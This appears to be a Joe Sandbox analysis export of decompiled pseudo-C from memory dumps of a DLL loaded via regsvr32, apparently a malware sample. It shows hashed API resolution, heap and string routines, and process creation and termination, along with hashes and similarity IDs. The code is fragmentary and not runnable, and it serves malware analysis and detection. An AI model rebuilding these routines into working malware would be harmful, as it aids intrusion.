Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CloseHandle$ProcessTerminate
String ID:
API String ID: 1541851893-0
Opcode ID: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
Instruction ID: 6aea6e80272aa285d695e7919669a58fbc0d4d182d54ab24a0e74719d0bdf862
Opcode Fuzzy Hash: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
Instruction Fuzzy Hash: 27017D35701A49C1EB96DF66D8547A97361FB8CFD5F05C021AE1E82725DE28C64DC701

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800020DC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 138
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E000000011800020DC(void* __edi, long long* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi) {
				void* _t28;
				void* _t31;
				intOrPtr _t43;
				intOrPtr _t44;
				signed int _t45;
				long long* _t82;
				void* _t83;
				void* _t84;
				long long* _t85;
				void* _t105;
				long long _t109;
				void* _t112;
				void* _t113;
				void* _t122;
				int _t124;
				int _t127;
				intOrPtr* _t128;
				void* _t130;
				CHAR* _t132;

				_t82 = __rax;
				 *((long long*)(_t112 + 8)) = __rbx;
				 *((long long*)(_t112 + 0x18)) = _t109;
				 *((long long*)(_t112 + 0x20)) = __rsi;
				_t113 = _t112 - 0x1c0;
				_t110 =  *0x8000d4a0;
				_t128 = __rdx;
				r14d = 0;
				 *(_t113 + 0x1f8) = lstrlenA(_t132);
				memset(_t130, _t127, _t124);
				_t6 = _t105 + 1; // 0x1
				_t7 = _t130 + 2; // 0x2
				r11d = _t7;
				r8d = _t6;
				 *__rdx = r11w;
				HeapAlloc(_t105, ??);
				if (__rax == 0) goto 0x80002287;
				_t28 = memcpy(??, ??, ??);
				_t43 =  *((intOrPtr*)(__rax));
				if (_t43 == dil) goto 0x80002192;
				if (_t43 == 0x3a) goto 0x8000218d;
				_t44 =  *((intOrPtr*)(__rax + 1));
				if (_t44 != dil) goto 0x8000217d;
				if (_t44 != dil) goto 0x80002195;
				_t122 = _t105;
				if (_t122 == _t105) goto 0x800021d9;
				_t8 = _t122 + 1; // 0x1
				 *_t122 = dil;
				if (_t8 == _t105) goto 0x800021d9;
				if (E000000011800038F8(_t28, 0, _t8, _t113 + 0x1f8) == 0) goto 0x80002279;
				_t45 =  *(_t113 + 0x1f8) & 0x0000ffff;
				asm("ror cx, 0x8");
				 *(_t128 + 2) = _t45;
				if (_t45 == 0) goto 0x80002279;
				E0000000118000459C(_t29, 0x25fff021,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t82 == _t105) goto 0x800021f5;
				_t31 =  *_t82();
				goto 0x800021f8;
				_t83 = _t105;
				if (_t83 != _t105) goto 0x8000224d;
				E0000000118000459C(_t31, 0xb27f4910,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				if (_t83 == _t105) goto 0x8000221e;
				 *_t83();
				goto 0x80002220;
				if (0 != 0) goto 0x80002249;
				r14d = 1;
				E0000000118000459C(0, 0x25fff021,  *((intOrPtr*)(_t110 + 0x30)));
				if (_t83 == _t105) goto 0x80002241;
				 *_t83();
				goto 0x80002244;
				_t84 = _t105;
				if (_t84 != _t105) goto 0x8000224d;
				goto 0x8000225f;
				_t85 =  *((intOrPtr*)(_t84 + 0x18));
				 *((intOrPtr*)(_t128 + 4)) =  *((intOrPtr*)( *_t85));
				if (r14d == 0) goto 0x80002279;
				E0000000118000459C( *((intOrPtr*)( *_t85)), 0x9cb92d3f,  *((intOrPtr*)(_t110 + 0x30)));
				if (_t85 == _t105) goto 0x80002279;
				 *_t85();
				HeapFree(??, ??, ??);
				return 1;
			}

0x1800020dc
0x1800020dc
0x1800020e1
0x1800020e6
0x1800020f4
0x1800020fb
0x180002108
0x180002112
0x180002122
0x180002136
0x18000213b
0x18000213e
0x18000213e
0x180002142
0x18000214a
0x180002151
0x18000215d
0x18000216c
0x180002171
0x18000217b
0x180002180
0x180002185
0x18000218b
0x180002190
0x180002192
0x180002198
0x18000219a
0x18000219e
0x1800021a4
0x1800021b9
0x1800021bf
0x1800021c7
0x1800021cb
0x1800021d3
0x1800021e4
0x1800021ec
0x1800021f1
0x1800021f3
0x1800021f5
0x1800021fb
0x180002206
0x18000220e
0x18000221a
0x18000221c
0x180002222
0x18000222a
0x180002230
0x180002238
0x18000223d
0x18000223f
0x180002241
0x180002247
0x18000224b
0x18000224d
0x18000225b
0x180002262
0x18000226d
0x180002275
0x180002277
0x180002281
0x1800022a9

APIs

lstrlenA.KERNEL32 ref: 0000000180002117
memset.NTDLL ref: 0000000180002136
HeapAlloc.KERNEL32 ref: 0000000180002151
memcpy.NTDLL ref: 000000018000216C
HeapFree.KERNEL32 ref: 0000000180002281

Strings

lJu, xrefs: 0000000180002129

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$AllocFreelstrlenmemcpymemset
String ID: lJu
API String ID: 1735321128-4100297759
Opcode ID: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
Instruction ID: f04020e7afacaa342a0f02f17fd00bf906b29f7f5bb121ef27d08f96d68cd7ee
Opcode Fuzzy Hash: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
Instruction Fuzzy Hash: D7510C32304A9C96EAE3DBA299143EA7792F78CBC4F59C021FE5947755DD39CE898300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005DF8 Relevance: 9.1, APIs: 6, Instructions: 131
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00000001180005DF8(void* __ebx, void* __ecx, void* __fp0, long long __rbx, intOrPtr* __rcx, void* __r8) {
				void* _t41;
				void* _t50;
				signed long long _t92;
				long _t115;
				intOrPtr* _t116;
				void* _t118;
				long _t121;
				void* _t125;
				void* _t126;
				long _t134;
				void* _t137;

				 *((long long*)(_t125 + 0x18)) = __rbx;
				_t126 = _t125 - 0x30;
				_t92 =  *0x8000d4a0;
				_t122 =  *__rcx;
				r13d = 0;
				_t116 = __rcx;
				 *(__rcx + 0x5c) = r13d;
				 *(_t126 + 0x68) = r13d;
				if ( *((intOrPtr*)(__rcx + 0x58)) != r13d) goto 0x80005fbc;
				 *(_t126 + 0x60) = 4;
				E0000000118000459C(_t41, 0x5431d47a,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t92 == _t137) goto 0x80005e56;
				 *_t92();
				goto 0x80005e59;
				if (r13d == r13d) goto 0x80005fb4;
				E0000000118000459C(r13d, 0xbe782669,  *((intOrPtr*)(_t122 + 0x50)));
				if (_t92 == _t137) goto 0x80005e9d;
				_t10 = _t126 + 0x68; // 0xa
				r8d = 0;
				 *((long long*)(_t126 + 0x28)) = _t10;
				 *((long long*)(_t126 + 0x20)) = _t126 + 0x60;
				 *_t92();
				goto 0x80005ea0;
				if (r13d == r13d) goto 0x80005fb4;
				 *(_t126 + 0x68) = r13d;
				 *(_t126 + 0x60) = r13d;
				E0000000118000459C(r13d, 0xbe782669,  *((intOrPtr*)(_t122 + 0x50)));
				if (_t92 == _t137) goto 0x80005eea;
				_t19 = _t126 + 0x68; // 0xa
				r9d = 0;
				r8d = 0;
				 *((long long*)(_t126 + 0x28)) = _t19;
				 *((long long*)(_t126 + 0x20)) = _t126 + 0x60;
				 *_t92();
				r8d =  *(_t126 + 0x60);
				_t50 = HeapAlloc(_t137, _t134, _t115);
				if (_t92 == _t137) goto 0x80005fad;
				E0000000118000459C(_t50, 0xbe782669,  *((intOrPtr*)(_t122 + 0x50)));
				if (_t92 == _t137) goto 0x80005f43;
				_t27 = _t126 + 0x68; // 0xa
				r8d = 0;
				 *((long long*)(_t126 + 0x28)) = _t27;
				 *((long long*)(_t126 + 0x20)) = _t126 + 0x60;
				 *_t92();
				goto 0x80005f46;
				if (r13d == r13d) goto 0x80005f95;
				 *(_t126 + 0x60) =  *(_t126 + 0x60) >> 1;
				 *((intOrPtr*)(_t92 + _t92 * 2)) = r13w;
				r8d =  *(_t126 + 0x60);
				HeapAlloc(_t118, _t121);
				if (_t92 == _t137) goto 0x80005f8e;
				r8d =  *(_t126 + 0x60);
				r8d = r8d + 1;
				wcstombs(??, ??, ??);
				 *(_t116 + 0x20) = _t92;
				goto 0x80005f9d;
				goto 0x80005f9d;
				GetLastError();
				HeapFree(??, ??, ??);
				goto 0x80005fbc;
				goto 0x80005fbc;
				return GetLastError();
			}

0x180005df8
0x180005e04
0x180005e08
0x180005e12
0x180005e19
0x180005e1c
0x180005e1f
0x180005e23
0x180005e2b
0x180005e31
0x180005e42
0x180005e4a
0x180005e52
0x180005e54
0x180005e5c
0x180005e6b
0x180005e73
0x180005e75
0x180005e7e
0x180005e81
0x180005e90
0x180005e99
0x180005e9b
0x180005ea3
0x180005ea9
0x180005eae
0x180005ebc
0x180005ec4
0x180005ec6
0x180005ecb
0x180005ece
0x180005ed1
0x180005edf
0x180005ee8
0x180005eea
0x180005ef8
0x180005f04
0x180005f13
0x180005f1b
0x180005f1d
0x180005f22
0x180005f28
0x180005f36
0x180005f3f
0x180005f41
0x180005f49
0x180005f56
0x180005f5a
0x180005f5f
0x180005f67
0x180005f73
0x180005f75
0x180005f80
0x180005f83
0x180005f88
0x180005f8c
0x180005f93
0x180005f95
0x180005fa5
0x180005fab
0x180005fb2
0x180005fce

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

HeapAlloc.KERNEL32 ref: 0000000180005EF8
HeapAlloc.KERNEL32 ref: 0000000180005F67
wcstombs.NTDLL ref: 0000000180005F83
HeapFree.KERNEL32 ref: 0000000180005FA5

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$Alloc$ErrorFreeLastwcstombs
String ID:
API String ID: 4133724704-0
Opcode ID: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
Instruction ID: a4f29d9b70dc603b3f8cc85abbd9ea91cf1cef2a8837b32e5229c32126143bc8
Opcode Fuzzy Hash: 153f03945acc7980eafc6a68c3935249d809b24ea8f0d96ec6fa36ed55d54185
Instruction Fuzzy Hash: 3F515A36204A8887E7A1DB52E4403AF7761F78C7C9F548521BA8D87B54DF38D65D8B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003FCC Relevance: 9.1, APIs: 6, Instructions: 125
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00000001180003FCC(void* __ecx, void* __edx, intOrPtr* __rcx, void* __r9) {
				void* __rbx;
				void* __rbp;
				void* _t32;
				void* _t37;
				void* _t72;
				long long* _t88;
				long long* _t89;
				void* _t91;
				intOrPtr* _t110;
				void* _t113;

				_t112 =  *__rcx;
				_t88 =  *0x8000d4a0;
				_t110 = __rcx;
				 *(_t113 + 0x58) =  *(_t113 + 0x58) & 0;
				E0000000118000459C(_t32, 0x3a7e805d,  *((intOrPtr*)( *__rcx + 0x50)));
				if (_t88 == 0) goto 0x8000400e;
				 *_t88();
				goto 0x80004010;
				if (0 == 0) goto 0x80004151;
				if ( *((intOrPtr*)(_t113 + 0x50)) == 0) goto 0x8000414c;
				 *0x8000d028();
				if (0 != 0) goto 0x80004145;
				r8d = 0x1000;
				_t37 = HeapAlloc(??, ??, ??);
				if (_t88 == 0) goto 0x80004133;
				E0000000118000459C(_t37, 0x3cd8e449,  *((intOrPtr*)(_t112 + 0x50)));
				if (_t88 == 0) goto 0x8000408d;
				r8d = 0x1000;
				r8d =  <  ?  *((void*)(_t113 + 0x50)) : r8d;
				 *_t88();
				goto 0x8000408f;
				if (0 == 0) goto 0x800040b7;
				r8d =  *(_t113 + 0x58);
				r9d = 0;
				_t89 =  *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x60))));
				 *((intOrPtr*)(_t89 + 0x20))();
				r11d =  *(_t113 + 0x58);
				 *((intOrPtr*)(_t113 + 0x50)) =  *((intOrPtr*)(_t113 + 0x50)) - r11d;
				if (0 == 0) goto 0x800040bf;
				goto 0x80004059;
				GetLastError();
				if (WaitForSingleObject(??, ??) == 0) goto 0x8000410b;
				E0000000118000459C(_t43, 0x3a7e805d,  *((intOrPtr*)(_t112 + 0x50)));
				if (_t89 == 0) goto 0x800040ef;
				 *_t89();
				goto 0x800040f1;
				if (0 == 0) goto 0x80004101;
				if ( *((intOrPtr*)(_t113 + 0x50)) == 0) goto 0x80004110;
				goto 0x80004059;
				GetLastError();
				goto 0x80004110;
				HeapFree(??, ??, ??);
				if (0x102 != 0) goto 0x80004138;
				E000000011800085E4(0x102, 0, _t72, _t91, _t110,  *((intOrPtr*)(_t113 + 0x60)));
				goto 0x80004138;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x60)))) + 0x10))();
				goto 0x80004166;
				goto 0x80004166;
				 *(_t110 + 0x60) =  *(_t110 + 0x60) & 0x00000008;
				goto 0x80004166;
				if (GetLastError() != 0x2efe) goto 0x80004166;
				 *(_t110 + 0x60) =  *(_t110 + 0x60) & 0x00000000;
				return 0;
			}

0x180003fd7
0x180003fda
0x180003fe1
0x180003fef
0x180003ff7
0x180003fff
0x18000400a
0x18000400c
0x180004012
0x18000401c
0x18000402e
0x180004036
0x18000403e
0x180004047
0x180004053
0x180004062
0x18000406a
0x180004070
0x180004083
0x180004089
0x18000408b
0x180004091
0x180004098
0x18000409d
0x1800040a0
0x1800040a6
0x1800040a9
0x1800040ae
0x1800040b3
0x1800040b5
0x1800040b7
0x1800040cd
0x1800040d8
0x1800040e0
0x1800040eb
0x1800040ed
0x1800040f3
0x1800040fa
0x1800040fc
0x180004101
0x180004109
0x180004118
0x180004120
0x18000412a
0x180004131
0x180004140
0x180004143
0x18000414a
0x18000414c
0x18000414f
0x18000415e
0x180004160
0x180004172

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

HeapAlloc.KERNEL32 ref: 0000000180004047
GetLastError.KERNEL32 ref: 00000001800040B7
WaitForSingleObject.KERNEL32 ref: 00000001800040C5
GetLastError.KERNEL32 ref: 0000000180004101
HeapFree.KERNEL32 ref: 0000000180004118

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorLast$Heap$AllocFreeObjectSingleWait
String ID:
API String ID: 2540544816-0
Opcode ID: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
Instruction ID: f07a79ff2e09cda6f9955aa739d580884efaaa7540e40516afedcf37a36379f0
Opcode Fuzzy Hash: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
Instruction Fuzzy Hash: B54143B330464986EB92DB66D8403EA73A1F78CBD1F048425BE498BB95DF78C68DC714

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800091F8 Relevance: 9.1, APIs: 6, Instructions: 80
timeCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E000000011800091F8(long long __rbx, signed long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, signed long long* _a8, void* _a16, void* _a24) {
				void* _t46;
				long _t52;
				signed long long _t65;
				long long _t67;
				signed long long* _t71;
				signed long long _t78;
				signed long long _t85;
				intOrPtr _t88;
				struct _FILETIME* _t89;
				void* _t96;
				void* _t100;
				signed long long _t101;
				signed long long* _t102;

				_t100 = _t96;
				 *((long long*)(_t100 + 0x10)) = __rbx;
				 *((long long*)(_t100 + 0x18)) = __rsi;
				 *(_t100 + 8) =  *(_t100 + 8) & 0x00000000;
				 *((long long*)(_t100 - 0x18)) = _t100 + 8;
				_t46 =  *((intOrPtr*)(__rcx + 0xa0))();
				_t71 = _a8;
				if (_t71 == 0) goto 0x8000925e;
				_t85 = _t71 + 0x18;
				 *(_t71 + 0x20) = _t85;
				_a8[3] = _t85;
				_a8[2] = __rcx;
				_a8[1] = __rdx;
				 *_a8 =  *_a8 | 0xffffffff;
				if (_t46 != 0) goto 0x80009327;
				GetSystemTimeAsFileTime(_t89);
				EnterCriticalSection(??);
				_t101 = __rcx + 0x88;
				_t78 =  *(_t101 + 8);
				_a8[3] = _t101;
				_a8[4] = _t78;
				 *_t78 =  &(_a8[3]);
				_t65 =  &(_a8[3]);
				 *(_t101 + 8) = _t65;
				LeaveCriticalSection(??);
				asm("lock add dword [edi+0x40], 0x1");
				E00000001180006C8C(_t65, __rbx, 0x180004c4c, _a8, __rdx, __rbp,  &(_a8[7]));
				_a8[6] = _t65;
				if (_a8[6] != 0) goto 0x80009331;
				_t52 = GetLastError();
				EnterCriticalSection(??);
				_t102 = _a8;
				_t67 =  *((intOrPtr*)(_t102 + 0x20));
				_t88 =  *((intOrPtr*)(_t102 + 0x18));
				 *_t67 = _t88;
				 *((long long*)(_t88 + 8)) = _t67;
				LeaveCriticalSection(??);
				asm("lock add dword [edi+0x40], 0xffffffff");
				if (_t52 == 0) goto 0x80009331;
				if (_a8 == 0) goto 0x80009331;
				E00000001180002770(_t67, _a8, _t88);
				return _t52;
			}

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000926A
EnterCriticalSection.KERNEL32 ref: 0000000180009274
LeaveCriticalSection.KERNEL32 ref: 00000001800092B4
GetLastError.KERNEL32 ref: 00000001800092E9
EnterCriticalSection.KERNEL32 ref: 00000001800092F5
LeaveCriticalSection.KERNEL32 ref: 0000000180009313

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTime$ErrorFileLastSystem
String ID:
API String ID: 3478816279-0
Opcode ID: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
Instruction ID: bca48ed322468cd715f0c7fdd995b284444db085db22600a9e38dd0ce7ab83a9
Opcode Fuzzy Hash: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
Instruction Fuzzy Hash: 18415676204F4992DB44CF55E48439D73B4F789B94F608221EBAD837A4DF3ACA6AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005A0C Relevance: 9.1, APIs: 6, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A5E
HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A72
WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AA0
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AB4
HeapFree.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AC4
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AD3

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ByteCharErrorHeapLastMultiWide$AllocFree
String ID:
API String ID: 2267670476-0
Opcode ID: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
Instruction ID: 6c13c8b96c3627637da9d419a19c7af847a2c5e8b3803c2844c54b1b1a61164e
Opcode Fuzzy Hash: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
Instruction Fuzzy Hash: 1B21A132304B4886E391DF63B88879A76A5F74CBD0F69C139EE9A93750DF34C9498701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009B7C Relevance: 9.1, APIs: 6, Instructions: 60
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00000001180009B7C(void* __ebx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _v40;
				long long _v56;
				void* _t33;
				intOrPtr _t34;
				void* _t56;
				WCHAR* _t64;
				WCHAR* _t67;
				CHAR* _t70;

				_t33 = _t56;
				 *((long long*)(_t33 + 8)) = __rbx;
				 *((long long*)(_t33 + 0x10)) = __rbp;
				 *((long long*)(_t33 + 0x18)) = __rsi;
				 *((long long*)(_t33 + 0x20)) = __rdi;
				_t34 =  *0x8000d4a0;
				lstrlenA(_t70);
				lstrlenW(_t67);
				lstrlenW(_t64);
				r8d = __rbx + _t34 + 0x12;
				HeapAlloc(??, ??, ??);
				if (_t34 == 0) goto 0x80009c2e;
				_v56 = __r8;
				__imp__wnsprintfW();
				r9d = 0;
				r8d = 0;
				E00000001180006754(__rbx, __rcx, _t34, __r8, __rdx,  *0x8000d490 + 0x80011438);
				HeapFree(??, ??, ??);
				goto 0x80009c32;
				return _v40;
			}

APIs

lstrlenA.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BB6
lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BBF
lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BCA
HeapAlloc.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BDF
wnsprintfW.SHLWAPI ref: 0000000180009C05

Part of subcall function 0000000180006754: memset.NTDLL ref: 0000000180006786
Part of subcall function 0000000180006754: CreateProcessW.KERNEL32 ref: 00000001800067F7
Part of subcall function 0000000180006754: WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
Part of subcall function 0000000180006754: TerminateProcess.KERNEL32 ref: 0000000180006844
Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000684F
Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000685A
Part of subcall function 0000000180006754: HeapFree.KERNEL32 ref: 0000000180006877

HeapFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009C26

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heaplstrlen$CloseFreeHandleProcess$AllocCreateMultipleObjectsTerminateWaitmemsetwnsprintf
String ID:
API String ID: 3150570956-0
Opcode ID: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
Instruction ID: c1893427c912dd33d9beb41109e2d516a90994c651c2d5da5d8851701b433d67
Opcode Fuzzy Hash: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
Instruction Fuzzy Hash: DD217F35710B48C6EB45CF66A85479A77A0F78CFC4F848126EE5A43B64DF38D60ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004DD0 Relevance: 8.8, APIs: 7, Instructions: 80
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00000001180004DD0(long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long* __r8) {
				void* _t13;
				intOrPtr* _t39;
				intOrPtr _t41;
				CHAR* _t54;
				long long _t60;
				long long _t61;
				void* _t63;
				long _t69;
				long _t73;
				long long _t74;
				void* _t76;
				CHAR* _t79;
				long long* _t80;

				 *((long long*)(_t63 + 8)) = __rbx;
				 *((long long*)(_t63 + 0x10)) = _t60;
				 *((long long*)(_t63 + 0x18)) = __rsi;
				_t39 =  *0x8000d4a0;
				_t80 = __rdx;
				_t41 =  *((intOrPtr*)(_t39 + 8));
				_t13 = lstrlenA(_t79) + 1;
				r8d = _t13;
				HeapAlloc(_t76, _t73, _t69);
				_t74 = _t39;
				if (_t39 == __rsi) goto 0x80004eb7;
				HeapAlloc(??, ??, ??);
				_t61 = _t39;
				if (_t39 == __rsi) goto 0x80004ea9;
				E00000001180004994(_t39, _t41);
				if (_t39 == __rsi) goto 0x80004e62;
				if ( *_t39 !=  *((intOrPtr*)(_t39 + 1))) goto 0x80004e62;
				E00000001180004994(_t39, _t41);
				if (_t39 == __rsi) goto 0x80004e8e;
				r8d = _t13 - r12d;
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t41 + _t74)) = sil;
				lstrcpyA(_t54);
				goto 0x80004e9c;
				lstrcpyA(??, ??);
				 *_t61 = 0x2f;
				 *((intOrPtr*)(_t61 + 1)) = sil;
				 *_t80 = _t74;
				 *__r8 = _t61;
				goto 0x80004eb7;
				HeapFree(??, ??, ??);
				return 1;
			}

0x180004dd0
0x180004dd5
0x180004dda
0x180004dec
0x180004df6
0x180004df9
0x180004e0d
0x180004e0f
0x180004e14
0x180004e1a
0x180004e20
0x180004e2e
0x180004e34
0x180004e3a
0x180004e3f
0x180004e4a
0x180004e51
0x180004e5a
0x180004e6b
0x180004e72
0x180004e77
0x180004e82
0x180004e86
0x180004e8c
0x180004e8e
0x180004e94
0x180004e98
0x180004e9c
0x180004ea4
0x180004ea7
0x180004eb1
0x180004ed5

APIs

lstrlenA.KERNEL32 ref: 0000000180004E02
HeapAlloc.KERNEL32 ref: 0000000180004E14
HeapAlloc.KERNEL32 ref: 0000000180004E2E
HeapFree.KERNEL32 ref: 0000000180004EB1

Part of subcall function 0000000180004994: strchr.NTDLL ref: 00000001800049B6

memcpy.NTDLL ref: 0000000180004E77
lstrcpyA.KERNEL32 ref: 0000000180004E86
lstrcpyA.KERNEL32 ref: 0000000180004E8E

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$Alloclstrcpy$Freelstrlenmemcpystrchr
String ID:
API String ID: 2951650171-0
Opcode ID: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
Instruction ID: 05cbd2bd38c1d1587f62c6617ae6625bb3c46c91ac70328d53f87b1fbcc7e3b3
Opcode Fuzzy Hash: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
